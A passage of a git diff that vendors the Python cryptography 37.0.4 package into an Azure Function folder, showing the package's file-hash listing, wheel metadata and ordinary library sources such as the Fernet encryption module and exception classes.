+cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/aead.py,sha256=1GASyrJPO8a-mDPTT7VJZXPb_0zEdrkW-Wu_rxV-6RQ,8442 +cryptography/hazmat/backends/openssl/backend.py,sha256=XBpLgVxVYvXwmkdcCwd0bVQWK0EBTHTbCFDsLGsBbBg,96584 +cryptography/hazmat/backends/openssl/ciphers.py,sha256=n3rrPQZi1blJBKqIWeMG6-U6YTvEb8rXGQKn8i-kFog,10342 +cryptography/hazmat/backends/openssl/cmac.py,sha256=K5-S0H72KHZH-WPAcHL5jCtcNyoBZSMe7VmxGn8_VWA,3005 +cryptography/hazmat/backends/openssl/decode_asn1.py,sha256=nSqtgO5MJVf_UUkvw9tez10zhGnsGHq24OP1X2GKOe4,1113 +cryptography/hazmat/backends/openssl/dh.py,sha256=9fwPordToELTkeJ-c7TuO9NiE1vfUBejk2QEUZbvo4s,12230 +cryptography/hazmat/backends/openssl/dsa.py,sha256=awfP80ykAfb4C_I-aOo-PnGU1DF6uf8bnEi-jld18ec,8888 +cryptography/hazmat/backends/openssl/ec.py,sha256=kgxwW508FTXDwGG-7pSywBLlICZKKfo4bcTHnNpsvJY,11103 +cryptography/hazmat/backends/openssl/ed25519.py,sha256=irHT-jSbpTNMMHqw5T885uzAi3Syf3kaaHuTnKgQPSg,5920 +cryptography/hazmat/backends/openssl/ed448.py,sha256=K8HDEiXl98QGJ-4llT4SVZf5-xe8aCuci00DkZf0lhw,5874 +cryptography/hazmat/backends/openssl/encode_asn1.py,sha256=4RUYVTpkYh6J1BnmYdr3G8xv4X1H-K2k2-fQoIDkpHI,570 +cryptography/hazmat/backends/openssl/hashes.py,sha256=3L5bkCOo2LbRSVNGLca_9rpCZ2zb8ISBrMLtts1BkEw,3241 +cryptography/hazmat/backends/openssl/hmac.py,sha256=9RX8bo9ywJievoodxjmqCXmD2iUWyH2jBmw78Hb-pOY,3095 +cryptography/hazmat/backends/openssl/poly1305.py,sha256=_qyGCXNaQVCFpa1qjb_9UtsI6lmnki_15Jbc5vihbeE,2514 +cryptography/hazmat/backends/openssl/rsa.py,sha256=KK97C_jBJEUGfKfJK7E8QZ-uZb6DTJjX6dLOuVbqTI8,20720 +cryptography/hazmat/backends/openssl/utils.py,sha256=7Ara81KkY0QCLPqW6kUG9dEsp52cZ3kOUJczwEpecJ0,1977 +cryptography/hazmat/backends/openssl/x25519.py,sha256=oA_ao4o27ki_OAx0UXNeI2ItZ84Xg_li7It1DxFlrZ0,4753 +cryptography/hazmat/backends/openssl/x448.py,sha256=a_zgqGUpGFvyKEoKRR1vgNdD_gk1gxGYpBp1a6x9HuE,4338 +cryptography/hazmat/backends/openssl/x509.py,sha256=WUoRC6UDM9FkOdn6xR5Mk-v_WCq7eJryenGN9ni8L-A,1452 +cryptography/hazmat/bindings/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/bindings/_openssl.abi3.so,sha256=ve_aeP0LRBDKeLMIFZHefDaeyl_qNpFckeq3pFXpVIY,8032104 +cryptography/hazmat/bindings/_rust.abi3.so,sha256=bZ1mlz1l1tNP4CVdX5h9YFCA84pR7RmMyjRvgEIi8C4,3624096 +cryptography/hazmat/bindings/_rust/__init__.pyi,sha256=ga5QLYp8MmumQB-Rp4TGHq_NAqONcXTrLm2712TZ9Ms,103 +cryptography/hazmat/bindings/_rust/asn1.pyi,sha256=Hovrt8dXZ9p8BKHaroPYmunu1VtDuirslJnE4jTG28s,411 +cryptography/hazmat/bindings/_rust/ocsp.pyi,sha256=jATWMh1yz5JpnnT7A10_sbY-ja5zARnOpZaToLqm43Y,768 +cryptography/hazmat/bindings/_rust/x509.pyi,sha256=YdnUA9uu60WhQP5QihTgo2pBrT49wxYtayCZ4trgZAg,1497 +cryptography/hazmat/bindings/openssl/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc,, +cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc,, +cryptography/hazmat/bindings/openssl/_conditional.py,sha256=K0JIsYkDBifV-x5WDeq9M1Hofr6HW667rDFlhDEiIMQ,10078 +cryptography/hazmat/bindings/openssl/binding.py,sha256=hWWp-N_JMUuYaNuRHgpadEEdVJsL-wAhdQpTj-Pi0Vc,8044 +cryptography/hazmat/primitives/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc,, +cryptography/hazmat/primitives/_asymmetric.py,sha256=nVJwmxkakirAXfFp410pC4kY_CinzN5FSJwhEn2IE34,485 +cryptography/hazmat/primitives/_cipheralgorithm.py,sha256=zd7N8rBYWaf8tPM7GDtZ9vUgarK_P0_PUNCFi3A0u0c,1016 +cryptography/hazmat/primitives/_serialization.py,sha256=OC_uXC5cNHucoOkHuTsZbfcQ9bvZs1cq7b18TcJu4Es,1341 +cryptography/hazmat/primitives/asymmetric/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/dh.py,sha256=pjjgKFcn2bCAaL_5zr0ygwXM8pHJFyAO6koJFkzhQb8,6604 +cryptography/hazmat/primitives/asymmetric/dsa.py,sha256=dIo6lYiHWRWUCxwejAi01w1-3jjmzEuJovqaVqDO3_g,7870 +cryptography/hazmat/primitives/asymmetric/ec.py,sha256=wX8wH9bD7g7-YxmINam_s9cPc9RUPrui2QdIKg6Q3Nc,14468 +cryptography/hazmat/primitives/asymmetric/ed25519.py,sha256=1qOl1UWV_-cXKHhwlFSyPBdhpx2HMDRukkI6eI5i8vM,2728 +cryptography/hazmat/primitives/asymmetric/ed448.py,sha256=oR-j4jGcWUnGxWi1GygHxVZbgkSOKHsR6y1E3Lf6wYM,2647 +cryptography/hazmat/primitives/asymmetric/padding.py,sha256=EkKuY9e6UFqSuQ0LvyKYKl_L19tOfNCTlHWEiKgHeUc,2690 +cryptography/hazmat/primitives/asymmetric/rsa.py,sha256=GiCIuBuJdpeew-yJ7mnTF4KFH_FUJaut1r-d6TRs31s,11322 +cryptography/hazmat/primitives/asymmetric/types.py,sha256=VidxjUWPOMB8q8vGiaXMhY715Zw8U9Vd4_rkqjOagRE,1814 +cryptography/hazmat/primitives/asymmetric/utils.py,sha256=5hD4KjfMbmozeFq08PLVunHr4FgeVzV1NkKalECM26s,756 +cryptography/hazmat/primitives/asymmetric/x25519.py,sha256=-nbaGlgT1sufO9Ic-urwKDql8Da0U3GL6hZJIMqHgVc,2588 +cryptography/hazmat/primitives/asymmetric/x448.py,sha256=V3lxb1VOiRTa3bzVUC3uZat2ogfExUOdktCIGUUMZ2Y,2556 +cryptography/hazmat/primitives/ciphers/__init__.py,sha256=Qp78Y3PDSRfwp7DDa3pezlLrED_QFhic_LvDw4LM9ZQ,646 +cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/aead.py,sha256=QnJD2doZ8XdpCIrDwqJBNgaw2eG9Tx4FWirIP159MAg,11488 +cryptography/hazmat/primitives/ciphers/algorithms.py,sha256=GoM_c2LNonci43B06g0e9zXW6PfBh_uAFiZhIxrQ_x4,4677 +cryptography/hazmat/primitives/ciphers/base.py,sha256=AiCYCzXbSZ9wQbXWMYc60IKmzqz5619YdaaF0zVr4rY,8251 +cryptography/hazmat/primitives/ciphers/modes.py,sha256=Pb2h2X0HUVfM6xKdSZjCgCsUcCQ32mDTSTRQQl4-1Gs,7988 +cryptography/hazmat/primitives/cmac.py,sha256=ODkc7EonY1cRxyJ0SYOuwtiYQv6B0ZPxJQm3rXxfXd4,2037 +cryptography/hazmat/primitives/constant_time.py,sha256=6bkW00QjhKusdgsQbexXhMlGX0XRN59XNmxWS2W38NA,387 +cryptography/hazmat/primitives/hashes.py,sha256=cpaYjgkazlq7Xw0MVoR3cp17mD0TgyEvhZQbyoAWHzU,5996 +cryptography/hazmat/primitives/hmac.py,sha256=M_sa4smPIkO8ra17Xl_cM0daRhGCozUu_8gnHePEIb0,2131 +cryptography/hazmat/primitives/kdf/__init__.py,sha256=DcZhzfLG8d8IYBH771lGTVU5S87OQDpu3nrfOwZnsmA,715 +cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/concatkdf.py,sha256=5YXw8cLZCBYT6rVDGS5URQEeFiPW-ZRBRcPdZQIxTMA,3772 +cryptography/hazmat/primitives/kdf/hkdf.py,sha256=LlDQbCvlNzuLa_UJXrkG5fXGjAjor5Wunv2378TBmms,3031 +cryptography/hazmat/primitives/kdf/kbkdf.py,sha256=QmgJw2_l0D21DEMMfuNQ6e1IaLV3bjwOzMJEAXhpOVs,7699 +cryptography/hazmat/primitives/kdf/pbkdf2.py,sha256=wEMH4CJfPccCg9apQLXyWUWBrZLTpYLLnoZEnzvaHQo,2032 +cryptography/hazmat/primitives/kdf/scrypt.py,sha256=JvX_cD0o0Op5EcFNeZhr-vI5sYv_LdnJ6kNEbW3u5ow,2228 +cryptography/hazmat/primitives/kdf/x963kdf.py,sha256=JsdrJhw2IJVYkl8JIWUN66h7DrKZM2RoQ_tw_iKAvdI,2018 +cryptography/hazmat/primitives/keywrap.py,sha256=TWqyG9K7k-Ymq4kcIw7u3NIKUPVDtv6bimwxIJYTe20,5643 +cryptography/hazmat/primitives/padding.py,sha256=xruasOE5Cd8KEQ-yp9W6v9WKPvKH-GudHCPKQ7A8HfI,6207 +cryptography/hazmat/primitives/poly1305.py,sha256=QvxPMrqjgKJt0mOZSeZKk4NcxsNCd2kgfI-X1CmyUW4,1837 +cryptography/hazmat/primitives/serialization/__init__.py,sha256=RALEthF7wRjlMyTvSq09XmKQey74tsSdDCCsDaD6yQU,1129 +cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/base.py,sha256=yw8_yzIvruT6fmS-KrTmIXbAF00rItH48WXTPOSLdJ4,1761 +cryptography/hazmat/primitives/serialization/pkcs12.py,sha256=tHQlCKOY0EfOBBiqR_et4TgcDY_OAtRENC69arjvyLU,6481 +cryptography/hazmat/primitives/serialization/pkcs7.py,sha256=LnISP-1SEDXCpsoEbR0EfuIlWm8eJAgWupt0gvHyyIU,5870 +cryptography/hazmat/primitives/serialization/ssh.py,sha256=Bp4M8yFrLnw9Oj3jCbttewovymCX_OGzBg5GBw4RPpA,23923 +cryptography/hazmat/primitives/twofactor/__init__.py,sha256=ZHo4zwWidFP2RWFl8luiNuYkVMZPghzx54izPNSCtD4,222 +cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc,, +cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc,, +cryptography/hazmat/primitives/twofactor/hotp.py,sha256=v4wkTbdc1E53POx6pdNnEUBvANbmt4f6scQSsTgABeU,2989 +cryptography/hazmat/primitives/twofactor/totp.py,sha256=bIIxOI-LcLGNahB5kN7A_TwEyYMTsLjHd8eJc4b2cLg,1449 +cryptography/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +cryptography/utils.py,sha256=v3zj8FS2bHYAmH__CECwfa0flmFCQnGrxZBRQcDys1A,5627 +cryptography/x509/__init__.py,sha256=yC0TbuvPmWL1U4rEY-0m46SayuxCfPVNFWjJJdi5lY0,7654 +cryptography/x509/__pycache__/__init__.cpython-39.pyc,, +cryptography/x509/__pycache__/base.cpython-39.pyc,, +cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc,, +cryptography/x509/__pycache__/extensions.cpython-39.pyc,, +cryptography/x509/__pycache__/general_name.cpython-39.pyc,, +cryptography/x509/__pycache__/name.cpython-39.pyc,, +cryptography/x509/__pycache__/ocsp.cpython-39.pyc,, +cryptography/x509/__pycache__/oid.cpython-39.pyc,, +cryptography/x509/base.py,sha256=FNBVG8ACCBZLF5TXlq1vjEPWtlR5YZ1Bs25AIxEHI34,33747 +cryptography/x509/certificate_transparency.py,sha256=Elm_-GGA6k9zrcm5KYVY5uTirDsvGc_BUuTLR7Hu-K4,1119 +cryptography/x509/extensions.py,sha256=LFy1jgd_0Z_P-lE2-07nZGJmsFh_1cOOTAl9ejyXFHQ,64999 +cryptography/x509/general_name.py,sha256=S_kJd4ZsNGrMfi2osfFJEWqPxy3oPCAWpLb91yhxzPs,7896 +cryptography/x509/name.py,sha256=EOtO9CscxrfsxhO6GTEfVhiZo3_EE7qGIFfv1eeI4-U,14200 +cryptography/x509/ocsp.py,sha256=OQKsqW_Y4mWY53UT_JG79RJR19xt53Q-iQSSw4m0kZM,16691 +cryptography/x509/oid.py,sha256=CLIlQwzE3PQXMvkKep4JbzVUaRDl_stwcX_U6-s2cNw,794 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/WHEEL new file mode 100644 index 0000000..1a16dce --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: false +Tag: cp36-abi3-manylinux_2_24_x86_64 + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/top_level.txt new file mode 100644 index 0000000..a229e5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/top_level.txt @@ -0,0 +1,2 @@ +_openssl +cryptography diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__about__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__about__.py new file mode 100644 index 0000000..9050849 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__about__.py @@ -0,0 +1,15 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +__all__ = [ + "__version__", + "__author__", + "__copyright__", +] + +__version__ = "37.0.4" + +__author__ = "The Python Cryptographic Authority and individual contributors" +__copyright__ = "Copyright 2013-2022 {}".format(__author__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__init__.py new file mode 100644 index 0000000..37b8a7e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__init__.py @@ -0,0 +1,29 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import sys +import warnings + +from cryptography.__about__ import ( + __author__, + __copyright__, + __version__, +) +from cryptography.utils import CryptographyDeprecationWarning + + +__all__ = [ + "__version__", + "__author__", + "__copyright__", +] + +if sys.version_info[:2] == (3, 6): + warnings.warn( + "Python 3.6 is no longer supported by the Python core team. " + "Therefore, support for it is deprecated in cryptography and will be" + " removed in a future release.", + CryptographyDeprecationWarning, + stacklevel=2, + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__about__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__about__.cpython-39.pyc new file mode 100644 index 0000000..3b90dd5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__about__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b73e1cc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..02c249b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/fernet.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/fernet.cpython-39.pyc new file mode 100644 index 0000000..2137359 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/fernet.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..142a04d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/exceptions.py new file mode 100644 index 0000000..3febede --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/exceptions.py @@ -0,0 +1,68 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils + +if typing.TYPE_CHECKING: + from cryptography.hazmat.bindings.openssl.binding import ( + _OpenSSLErrorWithText, + ) + + +class _Reasons(utils.Enum): + BACKEND_MISSING_INTERFACE = 0 + UNSUPPORTED_HASH = 1 + UNSUPPORTED_CIPHER = 2 + UNSUPPORTED_PADDING = 3 + UNSUPPORTED_MGF = 4 + UNSUPPORTED_PUBLIC_KEY_ALGORITHM = 5 + UNSUPPORTED_ELLIPTIC_CURVE = 6 + UNSUPPORTED_SERIALIZATION = 7 + UNSUPPORTED_X509 = 8 + UNSUPPORTED_EXCHANGE_ALGORITHM = 9 + UNSUPPORTED_DIFFIE_HELLMAN = 10 + UNSUPPORTED_MAC = 11 + + +class UnsupportedAlgorithm(Exception): + def __init__( + self, message: str, reason: typing.Optional[_Reasons] = None + ) -> None: + super(UnsupportedAlgorithm, self).__init__(message) + self._reason = reason + + +class AlreadyFinalized(Exception): + pass + + +class AlreadyUpdated(Exception): + pass + + +class NotYetFinalized(Exception): + pass + + +class InvalidTag(Exception): + pass + + +class InvalidSignature(Exception): + pass + + +class InternalError(Exception): + def __init__( + self, msg: str, err_code: typing.List["_OpenSSLErrorWithText"] + ) -> None: + super(InternalError, self).__init__(msg) + self.err_code = err_code + + +class InvalidKey(Exception): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/fernet.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/fernet.py new file mode 100644 index 0000000..fea0078 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/fernet.py @@ -0,0 +1,212 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import base64 +import binascii +import os +import time +import typing + +from cryptography import utils +from cryptography.exceptions import InvalidSignature +from cryptography.hazmat.primitives import hashes, padding +from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes +from cryptography.hazmat.primitives.hmac import HMAC + + +class InvalidToken(Exception): + pass + + +_MAX_CLOCK_SKEW = 60 + + +class Fernet: + def __init__( + self, + key: typing.Union[bytes, str], + backend: typing.Any = None, + ): + try: + key = base64.urlsafe_b64decode(key) + except binascii.Error as exc: + raise ValueError( + "Fernet key must be 32 url-safe base64-encoded bytes." + ) from exc + if len(key) != 32: + raise ValueError( + "Fernet key must be 32 url-safe base64-encoded bytes." + ) + + self._signing_key = key[:16] + self._encryption_key = key[16:] + + @classmethod + def generate_key(cls) -> bytes: + return base64.urlsafe_b64encode(os.urandom(32)) + + def encrypt(self, data: bytes) -> bytes: + return self.encrypt_at_time(data, int(time.time())) + + def encrypt_at_time(self, data: bytes, current_time: int) -> bytes: + iv = os.urandom(16) + return self._encrypt_from_parts(data, current_time, iv) + + def _encrypt_from_parts( + self, data: bytes, current_time: int, iv: bytes + ) -> bytes: + utils._check_bytes("data", data) + + padder = padding.PKCS7(algorithms.AES.block_size).padder() + padded_data = padder.update(data) + padder.finalize() + encryptor = Cipher( + algorithms.AES(self._encryption_key), + modes.CBC(iv), + ).encryptor() + ciphertext = encryptor.update(padded_data) + encryptor.finalize() + + basic_parts = ( + b"\x80" + + current_time.to_bytes(length=8, byteorder="big") + + iv + + ciphertext + ) + + h = HMAC(self._signing_key, hashes.SHA256()) + h.update(basic_parts) + hmac = h.finalize() + return base64.urlsafe_b64encode(basic_parts + hmac) + + def decrypt(self, token: bytes, ttl: typing.Optional[int] = None) -> bytes: + timestamp, data = Fernet._get_unverified_token_data(token) + if ttl is None: + time_info = None + else: + time_info = (ttl, int(time.time())) + return self._decrypt_data(data, timestamp, time_info) + + def decrypt_at_time( + self, token: bytes, ttl: int, current_time: int + ) -> bytes: + if ttl is None: + raise ValueError( + "decrypt_at_time() can only be used with a non-None ttl" + ) + timestamp, data = Fernet._get_unverified_token_data(token) + return self._decrypt_data(data, timestamp, (ttl, current_time)) + + def extract_timestamp(self, token: bytes) -> int: + timestamp, data = Fernet._get_unverified_token_data(token) + # Verify the token was not tampered with. + self._verify_signature(data) + return timestamp + + @staticmethod + def _get_unverified_token_data(token: bytes) -> typing.Tuple[int, bytes]: + utils._check_bytes("token", token) + try: + data = base64.urlsafe_b64decode(token) + except (TypeError, binascii.Error): + raise InvalidToken + + if not data or data[0] != 0x80: + raise InvalidToken + + if len(data) < 9: + raise InvalidToken + + timestamp = int.from_bytes(data[1:9], byteorder="big") + return timestamp, data + + def _verify_signature(self, data: bytes) -> None: + h = HMAC(self._signing_key, hashes.SHA256()) + h.update(data[:-32]) + try: + h.verify(data[-32:]) + except InvalidSignature: + raise InvalidToken + + def _decrypt_data( + self, + data: bytes, + timestamp: int, + time_info: typing.Optional[typing.Tuple[int, int]], + ) -> bytes: + if time_info is not None: + ttl, current_time = time_info + if timestamp + ttl < current_time: + raise InvalidToken + + if current_time + _MAX_CLOCK_SKEW < timestamp: + raise InvalidToken + + self._verify_signature(data) + + iv = data[9:25] + ciphertext = data[25:-32] + decryptor = Cipher( + algorithms.AES(self._encryption_key), modes.CBC(iv) + ).decryptor() + plaintext_padded = decryptor.update(ciphertext) + try: + plaintext_padded += decryptor.finalize() + except ValueError: + raise InvalidToken + unpadder = padding.PKCS7(algorithms.AES.block_size).unpadder() + + unpadded = unpadder.update(plaintext_padded) + try: + unpadded += unpadder.finalize() + except ValueError: + raise InvalidToken + return unpadded + + +class MultiFernet: + def __init__(self, fernets: typing.Iterable[Fernet]): + fernets = list(fernets) + if not fernets: + raise ValueError( + "MultiFernet requires at least one Fernet instance" + ) + self._fernets = fernets + + def encrypt(self, msg: bytes) -> bytes: + return self.encrypt_at_time(msg, int(time.time())) + + def encrypt_at_time(self, msg: bytes, current_time: int) -> bytes: + return self._fernets[0].encrypt_at_time(msg, current_time) + + def rotate(self, msg: bytes) -> bytes: + timestamp, data = Fernet._get_unverified_token_data(msg) + for f in self._fernets: + try: + p = f._decrypt_data(data, timestamp, None) + break + except InvalidToken: + pass + else: + raise InvalidToken + + iv = os.urandom(16) + return self._fernets[0]._encrypt_from_parts(p, timestamp, iv) + + def decrypt(self, msg: bytes, ttl: typing.Optional[int] = None) -> bytes: + for f in self._fernets: + try: + return f.decrypt(msg, ttl) + except InvalidToken: + pass + raise InvalidToken + + def decrypt_at_time( + self, msg: bytes, ttl: int, current_time: int + ) -> bytes: + for f in self._fernets: + try: + return f.decrypt_at_time(msg, ttl, current_time) + except InvalidToken: + pass + raise InvalidToken diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__init__.py new file mode 100644 index 0000000..b26b769 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__init__.py @@ -0,0 +1,10 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. +""" +Hazardous Materials + +This is a "Hazardous Materials" module. You should ONLY use it if you're +100% absolutely sure that you know what you're doing because this module +is full of land mines, dragons, and dinosaurs with laser guns. +""" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..8e473b3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/__pycache__/_oid.cpython-39.pyc 